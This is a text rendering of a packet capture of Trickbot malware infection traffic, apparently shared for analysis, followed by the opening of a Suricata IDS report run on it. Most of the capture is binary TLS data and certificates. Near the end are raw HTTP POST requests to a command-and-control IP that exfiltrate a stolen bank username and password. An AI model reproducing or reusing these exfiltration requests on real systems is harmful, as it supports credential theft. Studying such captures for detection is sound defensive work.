´L‡9&Ìô"ÞE-o$\’xAð^gÿ՝ÞâVeiDÜÂËw¡f¹/‘:ÑW‘ƒwèMíÿ˜™+ýN絎ÎÝÂònǏOËÐ÷h÷Bù2ØÖýTÇí¾²cß|Ua€’
¼»:oìW4Õ×Õ§ký Ÿé¤/LQQ43ÌÎcóPLeq`ÒÛÍP-Dª£Ë†ðùĚmn8¹æ¿ÖëæÀ¶icZ†/H¸,î¢ëß²šK´¦*еgÅ®Ò~—hÀÈ»üÐkꆳöÎ6l0Çð¬+)	
m’±sºC-C÷ŒÅYÍ7¿N\R7\R7à-2E$q%;÷
ePÀ*Pc*GÈøۏ¡J?ãW$Äɵ‚œÉÁ‡xú+!#µ~TçÊ	BÌ~ŽÓót$¹’c´V0ól*¤|¦B
d¼ÌRŸb~ãøú>A/HG 0v"ÃÌÏð{ª¤ÖÎZKý—V!?ŽÀéÇR×¼¥øمm”n¦~ÜãL#‘ùéʼb˜æxE$ãrÈs<ÇÁ?Â/DßoÀ_$—íåՏR€ Ç¿÷\ùÒðýVT®ø,	;ë+ÆC¶æƒo
ŠÕnûve^a­·²Dñ`ƺ(”b¦]]~š2‡bAd~~…èxˆË=Xýò曘zš%"¶¦'0¥kÍ+7¾ôé…Û&ð=òuq†ä/‰ßBð÷ד%GÎâIĂp<wI1¨IXj@×h6úâ“äç-\TwJÕ³•æí©†§¹­ÚdÙµFO_@,Vw	àD 8Û~8‰ýJ\/*{;÷zªÐ­¥êÁÅÇþJ̙û¨¬Â/NiòF,·
w–ÉüððÇÞ+O9€}ÖÌ`Õ¦‡¢+PFßo\
sBW%=‰|‹+¸J“IÁ(j;¹9¥G8¤/ÞHa0Vò`×_C¿íl¥cª»WbSóÙ£|zù΂@“ÿUBTÛ%R£XÌöü$&ãæo1!â
—Íø
Ríà73õ˜»0¡—QzP`Þ+Ÿœ½Æ«u×.ßÒµ0Õï,(ù¦†°ª±*)Àe܂âuJI	Pýþ‚yæûÎ4*&ÿ+²l˜Éì3¿×`ªÆrçø~Ù¢ÙbåSWž›*Mú›®¾YèšÂ™0xàƵŽÇJƒ5r¥ÜZø4N³£ç›n™èç°3™Pó£¡êBž@𲷇ørèÃC<€4ê*@¸|-+zÉY„¦nXCþÇöîÖâ©lOÓŧdn7(|ä¬
ßdo¯ÔxÂ蜃mZ¨ZlÈjÿ&R/@Á]`>–LŸ|ÍNÛ¤§’Óà•|‹®Eý„\§$½±”Ë¿mªsYDÉyÿRšq.šâdL,ÊQNÛa=ÈÑÏ+öÌZ;ðޘy”Bâ³9Ñq”þ2Ë
žÖh Ësµú4FÜ¿šhί~þ¼ç²ëÕ¡Dæ˜yÜ¥‹¯DóöÌV´ƒoÖfù?°ê¾‡TøÎëì(\q’aæV-0ÉÂï.@[ðº¦k,˜?ñžëÊ6¨šò>²¹ËÀRõ‰üUúa8§ç\“fB„,òeG¦6P´
–,Â5»Æ€p¤)$7¤¼q¾’å¡>`Dóá~·Ð{árÖ©Åk¥.¥hí¡g…È:KͬG ©[äœ`ßß,©Vp5UÓt'qžOÔî*Z 2„c
U
wüžŸÜJÅÌ 	Ìüy›b:¯ëöQ§¬“6­PϤL:
Cä)þ´`ވQ® ãÕòêªÉzÃl‹m‘úóü¤J4ÆÌ3Io‹ˆí@[@(S)
£‹þöúçžáòrӗ3¡ZÇ3ƒG„–ÕÑ_Š@?ÿŒP1/×ö(>rLn!«sϜˆ*Qg¥—«˜3œºú±ýçŠN]”Íôs†,€*Øo¸ÂÑ@ºsÚ¹Em㸴ýJ'¬ôáGÚ1|(U}76_“‹;ñ'¶ï_m˜öý4\R7à-Å%;÷
ePÀ*N\R7\R7à-2E$q%;÷
ePÀ*P &‚ù9iyÀNçF…Ò†¶Œ®¬G`‡ ãWOQ!Μ'dŽ#ëA¾mcÒÈ©
zè!ٖߤ'÷P÷Ðæ
Ã=V‡	„è§ìUwð<t¦Ã;I(…ëí1K›”i€du'Q3HÞÌâ@8˜Ý½êÓ+*ô-(›<+r,™›ß$¹$è”ÔÖÙRCK¯4`üªWœïuü•:¨½ú0¼†qÎs[ÀZb îêAÇ­Ÿ(ûWYT«Õ'Y^Jr`°5úJˆ<‚‡¦õ	s4nj2z‹†V.rlRˆè	͉»E°ÌbŠ(šO\µÎ<LU]1*\î?¢Áégb—aøëy½ÇÁk„cöîîá÷áõççÔE¾rîÁ§îÏ77ŒYpëæ|W$¯ô¯¡»Ì~n7­Äö´GL%‘Ð}[ðvàkØdŒ,Ê÷¡\ŽUé°	àOL¤þâKU…-MâØhi÷ºB>›Í$½@÷è8ŠðŸ%õ?*kºÍePÆ 8[5^:4zÝeÕS>8â”æz>aáÄüþ™×ö„ˆÅD‡×#þñ¶9yBÎk^æU´íê
Èì.%h·¢뇟V·±™S¦BWV]
î«ÕåÍîOÄ 
·—,×£=K¿,tNÌËè´€
å!['~x×èh$È jà5
´	õªän߂²S¯Ý˜(­žã+Ռ;®BoÂ>RÄDÇ(ñm` q”‘ÓÏý€@ø{ -‚ž'ä<±ë²Y|fKš®þ%Ñh¼cZgÜ?¢gÂ{eB‚Vµ§§öy2%{ÙUÏkúLÅñâ˜Ö”`žݯéfiý-"NÊêÍÊÔ+5q>ˆ³=½Ñ=ÈibÓè®DÙGs]‡0ÖʛcsJKsæŸÓVG„ÜdãÆõo›_‚ð©T™HVn±¾Ç•VÙ§1mçãñ°-2Ô SŒè	‹1ç™Í¯ÊIèNˆð6ädY㌉
Cµ(+á+<ÊnúÀ®‹ó ›pm0Æg*t؎ø<Ëoî¾QuFkÑ·Ý\ûSnTÝÂè±úgà-h ¼HÓE¿0Ÿa«óL'é´Üꯅ6uèù¸¢r‰ÔûΔ™—cL÷ᵔ’Yòä8Ö¿ÖÅ_¥ÇnÃcÞ)S¢:#meåë„Iiºs*ðÒ¼9)Xß6	ÑísÆy‚ŒGʁ&»¥\l‘¹!4܉­Å83;²…øÔËKg}xPC¦֟1,®>€Ç
*Êe
=H†«(/
­Ï"	ôºeŸÏÑS¯tœVü¹ï“¥¤-8½z2ð-¢âè÷ZÐeùÈ~ˆÈal̈Ò
„ñ”î(˜Mjœ}:Ѫ
´L‡9&Ìô"ÞE-o$\’xAð^gÿ՝ÞâVeiDÜÂËw¡f¹/‘:ÑW‘ƒwèMíÿ˜™+ýN絎ÎÝÂònǏOËÐ÷h÷Bù2ØÖýTÇí¾²cß|Ua€’
¼»:oìW4Õ×Õ§ký Ÿé¤/LQQ43ÌÎcóPLeq`ÒÛÍP-Dª£Ë†ðùĚmn8¹æ¿ÖëæÀ¶icZ†/H¸,î¢ëß²šK´¦*еgÅ®Ò~—hÀÈ»üÐkꆳöÎ6l0Çð¬+)	
m’±sºC-C÷ŒÅYÍ7¿N\R7\R7à-2E$q%;÷
ePÀ*Pc*GÈøۏ¡J?ãW$Äɵ‚œÉÁ‡xú+!#µ~TçÊ	BÌ~ŽÓót$¹’c´V0ól*¤|¦B
d¼ÌRŸb~ãøú>A/HG 0v"ÃÌÏð{ª¤ÖÎZKý—V!?ŽÀéÇR×¼¥øمm”n¦~ÜãL#‘ùéʼb˜æxE$ãrÈs<ÇÁ?Â/DßoÀ_$—íåՏR€ Ç¿÷\ùÒðýVT®ø,	;ë+ÆC¶æƒo
ŠÕnûve^a­·²Dñ`ƺ(”b¦]]~š2‡bAd~~…èxˆË=Xýò曘zš%"¶¦'0¥kÍ+7¾ôé…Û&ð=òuq†ä/‰ßBð÷ד%GÎâIĂp<wI1¨IXj@×h6úâ“äç-\TwJÕ³•æí©†§¹­ÚdÙµFO_@,Vw	àD 8Û~8‰ýJ\/*{;÷zªÐ­¥êÁÅÇþJ̙û¨¬Â/NiòF,·
w–ÉüððÇÞ+O9€}ÖÌ`Õ¦‡¢+PFßo\
sBW%=‰|‹+¸J“IÁ(j;¹9¥G8¤/ÞHa0Vò`×_C¿íl¥cª»WbSóÙ£|zù΂@“ÿUBTÛ%R£XÌöü$&ãæo1!â
—Íø
Ríà73õ˜»0¡—QzP`Þ+Ÿœ½Æ«u×.ßÒµ0Õï,(ù¦†°ª±*)Àe܂âuJI	Pýþ‚yæûÎ4*&ÿ+²l˜Éì3¿×`ªÆrçø~Ù¢ÙbåSWž›*Mú›®¾YèšÂ™0xàƵŽÇJƒ5r¥ÜZø4N³£ç›n™èç°3™Pó£¡êBž@𲷇ørèÃC<€4ê*@¸|-+zÉY„¦nXCþÇöîÖâ©lOÓŧdn7(|ä¬
ßdo¯ÔxÂ蜃mZ¨ZlÈjÿ&R/@Á]`>–LŸ|ÍNÛ¤§’Óà•|‹®Eý„\§$½±”Ë¿mªsYDÉyÿRšq.šâdL,ÊQNÛa=ÈÑÏ+öÌZ;ðޘy”Bâ³9Ñq”þ2Ë
žÖh Ësµú4FÜ¿šhί~þ¼ç²ëÕ¡Dæ˜yÜ¥‹¯DóöÌV´ƒoÖfù?°ê¾‡TøÎëì(\q’aæV-0ÉÂï.@[ðº¦k,˜?ñžëÊ6¨šò>²¹ËÀRõ‰üUúa8§ç\“fB„,òeG¦6P´
–,Â5»Æ€p¤)$7¤¼q¾’å¡>`Dóá~·Ð{árÖ©Åk¥.¥hí¡g…È:KͬG ©[äœ`ßß,©Vp5UÓt'qžOÔî*Z 2„c
U
wüžŸÜJÅÌ 	Ìüy›b:¯ëöQ§¬“6­PϤL:
Cä)þ´`ވQ® ãÕòêªÉzÃl‹m‘úóü¤J4ÆÌ3Io‹ˆí@[@(S)
£‹þöúçžáòrӗ3¡ZÇ3ƒG„–ÕÑ_Š@?ÿŒP1/×ö(>rLn!«sϜˆ*Qg¥—«˜3œºú±ýçŠN]”Íôs†,€*Øo¸ÂÑ@ºsÚ¹Em㸴ýJ'¬ôáGÚ1|(U}76_“‹;ñ'¶ï_m˜öý4\RE2ϱ”¾žÁ
eÁÀ-N\RE\RE2Ï2E$0Ÿ¾žÁ
eÁÀ-P&YUåè[j†^R3"MŠ½åG	Å)´mƒÝoxab 4£ˆ¦ë‘í4IμÉ)®m$ÒùˆUp¨³†8À
ÿnjgd0‚`0‚H 	÷óÈ®à¸Í"0
	*†H†÷
0E10	UAU10U
Some-State1!0U
Internet Widgits Pty Ltd0
180924152453Z
190924152453Z0E10	UAU10U
Some-State1!0U
Internet Widgits Pty Ltd0‚"0
	*†H†÷
‚0‚
‚Ù]ÐÖÓ*òXcƍ=¸üe[iß"š=ä顸®±ìvUòAóŒWû«,i\x\7e
G¹†<Œ}"ؾZæee{y?ö{†ØÉO÷p\h¢~ç¥!õšýæùsu=‰5ê`dSz¿är}Èþ¢ŒòÚþrª£—ņýFIÎÔH¶§D¿h‡üàû+šbÞhû‹zÅ>7\×hÖཎꙊ¤è¦(Z”B”o¬	ˆáç\3ýć¦å`®66„3F¯ ØΪ
(ŸÔ4éª"ÿ¬oªémÖ±ÞÌdõq‘õë|Á‹Ãnµ­Cù7¦3€ÓÇy½º;†Ô¹7¬Ãæ©£S0Q0U£ÿ´E(ÂüzRû³=×äÏô0U#0€£ÿ´E(ÂüzRû³=×äÏô0Uÿ0ÿ0
	*†H†÷
‚rh³`³ŽòÑ¥Ss£×]VÄNëZ¢FâÚ<šGݘ[±~½Ÿˆ3QŒ1ß1¢ÕH’îF5xÀ‡¬ÞïÊnä:1úߋÞjÿɜé³eÙP¼„¼=â²wÛBx.V8?¿Ü¡‡=ƒAMªÐ¿ŒRNOgÇš.O
ýw1o¼yÈٖHgɲ¾ˆæßÄäaaÄaô6¶Z%‡ìP?·,IT›xî³ëÈqÀ5pʤÂìá"ÿ‰··°ÝxàFZ™ ÑF@(>•tÑ´)/†¯ŒŽAÔD‹¶ô§ùLþe'{_i$‚ñɟ<1¬´)u{÷=昈¸y¥¶?QXr2˜#…‰KGAà5¸‰ÜÎP
Ų\Ql}¢Q*ƀÚ*Ì-˜âáØ8x¹6\µ¥¹é…â¥7éè㹔)<ZÜtlfËÖ¿ÏAöÖÿúhhHe’7´¦ú@ÌʽžZä1×8Ë	•Ñ4o‚gú<8ó†fe·ôeٍÆߛᆈn¢Œ¥ƒØ¬dTÕ¯ÞCNå[–yŒù’mYð×2V“?½È:¤+¡ãŸßÞ}¹ÈHWkÓÈÊÓjÞ×Ëè.ÆY_hÌ•y²xý
’e¬î¹¼yS/ÞYóù²LP†Üá7ˤë*ICtÕ&‰C1 ¥©ä«ç’›LNéu~f˜§IÖÚÖöÂ
ð`G…Éþ:H“shRˆ á"è€\RE\RE2ÏdEV5m¾žÁ
eÁÀ-Pò|îáÓ»"ÃA÷ c™èuÁÛy¯‚>¤<Ö]踲
Ô53“#¯qª4\RJ¡ *ã\&‡—
e¿À0N\RJ\RJ¡ 2G® å*¶“ñE$"A€U\&‡—
e¿À0Ä!†ÉPúð= YUÃûÃøÐíÃε¶4{7©:XÇH!%«·’Ccq’ 
Êv%b×z¨žgðã‰"Öí© ÖÙtÙ‚º‹¡À
ÿÏËÈÅ0‚Á0‚© 	³°ÂLG› 0
	*†H†÷
0w10	UGB10
ULondon10
ULondon10U
Global Security10U
IT Department10Uexample.com0
190128085254Z
200128085254Z0w10	UGB10
ULondon10
ULondon10U
Global Security10U
IT Department10Uexample.com0‚"0
	*†H†÷
‚0‚
‚°»Ë­+‘ÊvqO Ù':u
Óí¿[‚<¿Z¡†;VkŽ­$W±ÙHç€A”fÝå\~QjxÈ´*¿|/4Îø×8G˜Å²æo÷}q˗*T´Þ#4fª¯Ta½5-¾‚nü‡R–•™GŒi0ª|{àJ^K©™?*bûdCò’Pșû)¡7†hãˆ9™D£$]{@+<>tøÓð5BcÀ0jÍÌ?œ«—¿ñÊï1:š«Î6lWôju>ـŽÜ+3šdH'Ðhr¨0¡f=Ö2y~€$—B
Ùª€û6ôR±gI<X+n&?.êiSž§õ²'Íä)3ǵ£P0N0U%â=G¸ù0Ç®t‹<çÆ0U#0€%â=G¸ù0Ç®t‹<çÆ0U0ÿ0
	*†H†÷
‚w$pŠ# ƒš‹@ÃÓJþH‹TÚDU@oGÁ7í3·VIô'MnHVîJç+݋§þàŸE7ò]´«‰O*¾¿éVH0&ÚÎù´
þ`"×ßÌÌ«í´ š¬S}ºÍŽÛkH_eOÁÍ*WF‚Ž	µ›"0œ¡õu8k-þ€²¡˜ÂAµUŠ(§›)0{kqµ³‹ÏkgžÿžRXh6myÔwâXi)蟫‡¢"è:yŸ1/wfKTÉ°¤U{X͵¿Ñ¸›X•‰xs^‡õzž9­<>áÊ/2‚Ù†­Ñwräó|ý¸ú,~¶ÅÀ£Z U΄$øóKGAM[;x!?rք&_psÒL$U@*ƒÂ<ÄÀÍÒT{¥ý¸Áæ)_>õ0XÞešw:}Qþ-®áŽT‚v?Sx=Ñr,…ç©„ÔY½º_ú§mÏîØ1•¾öýs~Žf†ž®sŸ‘¥m)ÉË«UÇó>{2v*y&·šæ<¹Í‹|]bÒ=jÜëåŸÊ†ˆ„¨®ã7®ÿub®Ë×l~bÒo‚&R@Sï’mM4\RJÅ֕\&‡—
e¿À0N\RJ\RJÅ2E$©±\&‡—
e¿À0PšHYUÃûÃøÐíÃε¶4{7©:XÇH!%«·’Ccq’ 
Êv%b×z¨žgðã‰"Öí© ÖÙtÙ‚º‹¡À
ÿÏËÈÅ0‚Á0‚© 	³°ÂLG› 0
	*†H†÷
0w10	UGB10
ULondon10
ULondon10U
Global Security10U
IT Department10Uexample.com0
190128085254Z
200128085254Z0w10	UGB10
ULondon10
ULondon10U
Global Security10U
IT Department10Uexample.com0‚"0
	*†H†÷
‚0‚
‚°»Ë­+‘ÊvqO Ù':u
Óí¿[‚<¿Z¡†;VkŽ­$W±ÙHç€A”fÝå\~QjxÈ´*¿|/4Îø×8G˜Å²æo÷}q˗*T´Þ#4fª¯Ta½5-¾‚nü‡R–•™GŒi0ª|{àJ^K©™?*bûdCò’Pșû)¡7†hãˆ9™D£$]{@+<>tøÓð5BcÀ0jÍÌ?œ«—¿ñÊï1:š«Î6lWôju>ـŽÜ+3šdH'Ðhr¨0¡f=Ö2y~€$—B
Ùª€û6ôR±gI<X+n&?.êiSž§õ²'Íä)3ǵ£P0N0U%â=G¸ù0Ç®t‹<çÆ0U#0€%â=G¸ù0Ç®t‹<çÆ0U0ÿ0
	*†H†÷
‚w$pŠ# ƒš‹@ÃÓJþH‹TÚDU@oGÁ7í3·VIô'MnHVîJç+݋§þàŸE7ò]´«‰O*¾¿éVH0&ÚÎù´
þ`"×ßÌÌ«í´ š¬S}ºÍŽÛkH_eOÁÍ*WF‚Ž	µ›"0œ¡õu8k-þ€²¡˜ÂAµUŠ(§›)0{kqµ³‹ÏkgžÿžRXh6myÔwâXi)蟫‡¢"è:yŸ1/wfKTÉ°¤U{X͵¿Ñ¸›X•‰xs^‡õzž9­<>áÊ/2‚Ù†­Ñwräó|ý¸ú,~¶ÅÀ£Z U΄$øóKGAM[;x!?rք&_psÒL$U@*ƒÂ<ÄÀÍÒT{¥ý¸Áæ)_>õ0XÞešw:}Qþ-®áŽT‚v?Sx=Ñr,…ç©„ÔY½º_ú§mÏîØ1•¾öýs~Žf†ž®sŸ‘¥m)ÉË«UÇó>{2v*y&·šæ<¹Í‹|]bÒ=jÜëåŸÊ†ˆ„¨®ã7®ÿub®Ë×l~bÒo‚&R@Sï’mMá\RJ\RJÅÅE·®\&‡—
e¿À0P¨õÏ‘òçbuàôZñ{ê)”ÛÐ`Úf4‚K
ŸJjußpÿ”‚c¨’ò„ayXom¸ú”Cý¿B¼‚û„‘¶µÅŠÊ¼{7êé˜'Çñoá|k?lU,ß¹¬UéيL?&TØHø̉¬æø	6É~9‰g‹òÆO‘ó,Œ4\RJÅ*ã\&‡—
e¿À0N\RJ\RJÅ2E$©±\&‡—
e¿À0PšHYUÃûÃøÐíÃε¶4{7©:XÇH!%«·’Ccq’ 
Êv%b×z¨žgðã‰"Öí© ÖÙtÙ‚º‹¡À
ÿÏËÈÅ0‚Á0‚© 	³°ÂLG› 0
	*†H†÷
0w10	UGB10
ULondon10
ULondon10U
Global Security10U
IT Department10Uexample.com0
190128085254Z
200128085254Z0w10	UGB10
ULondon10
ULondon10U
Global Security10U
IT Department10Uexample.com0‚"0
	*†H†÷
‚0‚
‚°»Ë­+‘ÊvqO Ù':u
Óí¿[‚<¿Z¡†;VkŽ­$W±ÙHç€A”fÝå\~QjxÈ´*¿|/4Îø×8G˜Å²æo÷}q˗*T´Þ#4fª¯Ta½5-¾‚nü‡R–•™GŒi0ª|{àJ^K©™?*bûdCò’Pșû)¡7†hãˆ9™D£$]{@+<>tøÓð5BcÀ0jÍÌ?œ«—¿ñÊï1:š«Î6lWôju>ـŽÜ+3šdH'Ðhr¨0¡f=Ö2y~€$—B
Ùª€û6ôR±gI<X+n&?.êiSž§õ²'Íä)3ǵ£P0N0U%â=G¸ù0Ç®t‹<çÆ0U#0€%â=G¸ù0Ç®t‹<çÆ0U0ÿ0
	*†H†÷
‚w$pŠ# ƒš‹@ÃÓJþH‹TÚDU@oGÁ7í3·VIô'MnHVîJç+݋§þàŸE7ò]´«‰O*¾¿éVH0&ÚÎù´
þ`"×ßÌÌ«í´ š¬S}ºÍŽÛkH_eOÁÍ*WF‚Ž	µ›"0œ¡õu8k-þ€²¡˜ÂAµUŠ(§›)0{kqµ³‹ÏkgžÿžRXh6myÔwâXi)蟫‡¢"è:yŸ1/wfKTÉ°¤U{X͵¿Ñ¸›X•‰xs^‡õzž9­<>áÊ/2‚Ù†­Ñwräó|ý¸ú,~¶ÅÀ£Z U΄$øóKGAM[;x!?rք&_psÒL$U@*ƒÂ<ÄÀÍÒT{¥ý¸Áæ)_>õ0XÞešw:}Qþ-®áŽT‚v?Sx=Ñr,…ç©„ÔY½º_ú§mÏîØ1•¾öýs~Žf†ž®sŸ‘¥m)ÉË«UÇó>{2v*y&·šæ<¹Í‹|]bÒ=jÜëåŸÊ†ˆ„¨®ã7®ÿub®Ë×l~bÒo‚&R@Sï’mMá\RJ\RJÅÅE·®\&‡—
e¿À0P¨õÏ‘òçbuàôZñ{ê)”ÛÐ`Úf4‚K
ŸJjußpÿ”‚c¨’ò„ayXom¸ú”Cý¿B¼‚û„‘¶µÅŠÊ¼{7êé˜'Çñoá|k?lU,ß¹¬UéيL?&TØHø̉¬æø	6É~9‰g‹òÆO‘ó,Œ4\R{H}±”¾žÁ
eÁÀ1N\R{\R{H}2E$0Ÿ¾žÁ
eÁÀ1P¡YU¥ª{g \;ö¸ÉxBÀX;SÕæ÷µ[¿u¹ÝÛ±xÆ ç4Lµ$}ˆ?`ûë1žŽ›þñ	y·Î9or·9Vë:ÓÀ
ÿnjgd0‚`0‚H 	÷óÈ®à¸Í"0
	*†H†÷
0E10	UAU10U
Some-State1!0U
Internet Widgits Pty Ltd0
180924152453Z
190924152453Z0E10	UAU10U
Some-State1!0U
Internet Widgits Pty Ltd0‚"0
	*†H†÷
‚0‚
‚Ù]ÐÖÓ*òXcƍ=¸üe[iß"š=ä顸®±ìvUòAóŒWû«,i\x\7e
G¹†<Œ}"ؾZæee{y?ö{†ØÉO÷p\h¢~ç¥!õšýæùsu=‰5ê`dSz¿är}Èþ¢ŒòÚþrª£—ņýFIÎÔH¶§D¿h‡üàû+šbÞhû‹zÅ>7\×hÖཎꙊ¤è¦(Z”B”o¬	ˆáç\3ýć¦å`®66„3F¯ ØΪ
(ŸÔ4éª"ÿ¬oªémÖ±ÞÌdõq‘õë|Á‹Ãnµ­Cù7¦3€ÓÇy½º;†Ô¹7¬Ãæ©£S0Q0U£ÿ´E(ÂüzRû³=×äÏô0U#0€£ÿ´E(ÂüzRû³=×äÏô0Uÿ0ÿ0
	*†H†÷
‚rh³`³ŽòÑ¥Ss£×]VÄNëZ¢FâÚ<šGݘ[±~½Ÿˆ3QŒ1ß1¢ÕH’îF5xÀ‡¬ÞïÊnä:1úߋÞjÿɜé³eÙP¼„¼=â²wÛBx.V8?¿Ü¡‡=ƒAMªÐ¿ŒRNOgÇš.O
ýw1o¼yÈٖHgɲ¾ˆæßÄäaaÄaô6¶Z%‡ìP?·,IT›xî³ëÈqÀ5pʤÂìá"ÿ‰··°ÝxàFZ™ ÑF@(>•tÑ´)/†¯ŒŽAÔD‹¶ô§ùLþe'{_i$‚ñɟ<1¬´)u{÷=昈¸y¥¶?QXr2˜#…‰KGAJÌô¸bÛL¤Ã<#ÂJDŽÝû
ÃëÕh•}ùÑF‰¦_áàM¸j~7)µ~€	Ê|õ4/Ån4%œ~HWgæ#6ÿEòuáe­Ž—·*6yÞÃ%AZŽ•š]¹t2I¥ßsòóFðm¶úvÎlé{½¨x”J×û›GÝwæ
0;˜Ï]ou°¨¹â3`oJüB˜¾ûî9VŒüŠ—^Ê^
­ÆµÂQñ'õ;6;ßñ€Ù"ª!‚wqGKB¼ôÉ}{5ø|Jrw(ü§1¬Ÿóò'éގîBŸ V^5¶27
,Ýat•6›¤Õ©þ„ÑãßdÏ®é
^™C™‘M–ábdz-ð—Ùiø\‰6)¤r€\R{\R{H}dEV5m¾žÁ
eÁÀ1P­ë¯ÝÅè˜Ë„̟㚇©+H$¤þUÎ8‘ˆ…¿O?‚ëGß4\R}?â±”¾žÁ
eÁÀ2N\R}\R}?â2E$0Ÿ¾žÁ
eÁÀ2PÀYU•¿ÅªÙsPbZ¿
Øk5WGöcûºÕ±ËôæÀ ÈBM¢÷ûçS9x§0lİΉ±l…3ð|($½Z‘Á	À
ÿnjgd0‚`0‚H 	÷óÈ®à¸Í"0
	*†H†÷
0E10	UAU10U
Some-State1!0U
Internet Widgits Pty Ltd0
180924152453Z
190924152453Z0E10	UAU10U
Some-State1!0U
Internet Widgits Pty Ltd0‚"0
	*†H†÷
‚0‚
‚Ù]ÐÖÓ*òXcƍ=¸üe[iß"š=ä顸®±ìvUòAóŒWû«,i\x\7e
G¹†<Œ}"ؾZæee{y?ö{†ØÉO÷p\h¢~ç¥!õšýæùsu=‰5ê`dSz¿är}Èþ¢ŒòÚþrª£—ņýFIÎÔH¶§D¿h‡üàû+šbÞhû‹zÅ>7\×hÖཎꙊ¤è¦(Z”B”o¬	ˆáç\3ýć¦å`®66„3F¯ ØΪ
(ŸÔ4éª"ÿ¬oªémÖ±ÞÌdõq‘õë|Á‹Ãnµ­Cù7¦3€ÓÇy½º;†Ô¹7¬Ãæ©£S0Q0U£ÿ´E(ÂüzRû³=×äÏô0U#0€£ÿ´E(ÂüzRû³=×äÏô0Uÿ0ÿ0
	*†H†÷
‚rh³`³ŽòÑ¥Ss£×]VÄNëZ¢FâÚ<šGݘ[±~½Ÿˆ3QŒ1ß1¢ÕH’îF5xÀ‡¬ÞïÊnä:1úߋÞjÿɜé³eÙP¼„¼=â²wÛBx.V8?¿Ü¡‡=ƒAMªÐ¿ŒRNOgÇš.O
ýw1o¼yÈٖHgɲ¾ˆæßÄäaaÄaô6¶Z%‡ìP?·,IT›xî³ëÈqÀ5pʤÂìá"ÿ‰··°ÝxàFZ™ ÑF@(>•tÑ´)/†¯ŒŽAÔD‹¶ô§ùLþe'{_i$‚ñɟ<1¬´)u{÷=昈¸y¥¶?QXr2˜#…‰KGA%ÕhHv"Í÷šg¯ÿõ)³ ,æ©ì́1Úw;ctI.—ÅŠ6²	”æ@™¥Š(ÃöÁpHe¹Ôx%½ÇÏö7„5Z¤°æ(IFÓ)Ö¬ü‘•ƒþÆN˜C?4KF¥HŠô4Zý7fÅ©o¯5ЍØêW»Ɨyh}XØàAµØe|œ.ìšé
O
‚ìŝ$Päõö´réÐX<Ã6$â'x_âÂ\FåäMñtËA[~†wº%á€þÌ延CÐÝ9—=
»ÞdÌÞïâàT†awsZ2%*ü:Ãǔ߻dT]*ºyae³©‡›”2Xnù>_ƒ˜Ê7Œ‚h0ª7É;?¸%_D¥òaq€\R}\R}?âdEV5m¾žÁ
eÁÀ2PºoÊZ]LË6³|ïMNl.ßæO– Ó?®ŽŸWQ:œöÏr)Ï4	\R’^Ì6
e÷µ}À3’ý	\R’\R’^áEÓÂK
e÷µ}À3’Pÿ×POST /ser0130us/BRONSON-PC_W617601.9A539CBEA91F2D8402D649FD6638406A/81/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 24.247.181.125
Connection: close
Content-Type: multipart/form-data; boundary=---------OHYKDVMHWSHIPZQK
Content-Length: 254

P	\R’\R’^4E&Âø
e÷µ}À3’P-----------OHYKDVMHWSHIPZQK
Content-Disposition: form-data; name="data"

https://www.crazybank.com/|frankie.bronson|P@ssw0rd$

-----------OHYKDVMHWSHIPZQK
Content-Disposition: form-data; name="source"

IE passwords
-----------OHYKDVMHWSHIPZQK--
4
\R¿­ÝÌ6
e÷µ}À4’ý
\R¿\R¿­ÝáEÓÂK
e÷µ}À4’Pö¾POST /ser0130us/BRONSON-PC_W617601.9A539CBEA91F2D8402D649FD6638406A/83/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 2

This file has been truncated. Go here to download in full.


suricata-report-2019-01-31-T-09-00-39-01312019.0900-2019-01-30-Trickbot-infection-traffic.pcap.txt - (17821 bytes) - download
  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
lastcmd:ulimit -c unlimited; /opt/suricata400/bin/suricata -c /opt/suricata400/etc/etpro/suricata400-etpro-all.yaml -l /var/www/html/27c27f6013451b522f979b5a048809f156b33745cb75ec8c950e11a498e082d2 -r /var/pcap/01312019.0900-2019-01-30-Trickbot-infection-traffic.pcap -vvv -k none
elapsedtime:21.176566
stderr:
stdout:
31/1/2019 -- 09:00:18 - <Info> - Configuration node 'rule-files' redefined.
31/1/2019 -- 09:00:18 - <Notice> - This is Suricata version 4.0.0 RELEASE
31/1/2019 -- 09:00:18 - <Info> - CPUs/cores online: 1
31/1/2019 -- 09:00:18 - <Config> - 'default' server has 'request-body-minimal-inspect-size' set to 33259 and 'request-body-inspect-window' set to 16755 after randomization.
31/1/2019 -- 09:00:18 - <Config> - 'default' server has 'response-body-minimal-inspect-size' set to 32176 and 'response-body-inspect-window' set to 15681 after randomization.
31/1/2019 -- 09:00:18 - <Config> - DNS request flood protection level: 500
31/1/2019 -- 09:00:18 - <Config> - DNS per flow memcap (state-memcap): 524288
31/1/2019 -- 09:00:18 - <Config> - DNS global memcap: 16777216
31/1/2019 -- 09:00:18 - <Config> - allocated 262144 bytes of memory for the host hash... 4096 buckets of size 64
31/1/2019 -- 09:00:18 - <Config> - preallocated 1000 hosts of size 136
